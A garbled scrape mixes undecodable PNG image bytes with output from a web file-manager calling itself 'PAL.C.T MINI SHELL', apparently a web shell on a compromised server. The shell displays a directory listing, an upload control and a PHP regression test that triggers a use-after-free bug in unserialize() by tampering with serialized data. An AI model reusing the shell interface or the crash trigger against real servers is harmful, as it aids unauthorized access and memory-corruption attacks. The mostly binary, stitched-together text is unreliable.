php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /opt/php-7.0.1/ext/standard/tests/serialize/
upload
files >> //opt/php-7.0.1/ext/standard/tests/serialize/bug68594.phpt

--TEST--
Bug #68545 Use after free vulnerability in unserialize()
--FILE--
<?php
for ($i=4; $i<100; $i++) {
	$m = new StdClass();

	$u = array(1);

	$m->aaa = array(1,2,&$u,4,5);
	$m->bbb = 1;
	$m->ccc = &$u;
	$m->ddd = str_repeat("A", $i);

	$z = serialize($m);
	$z = str_replace("bbb", "aaa", $z);
	$y = unserialize($z);
	$z = serialize($y);
}
?>
===DONE===
--EXPECTF--
===DONE===
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`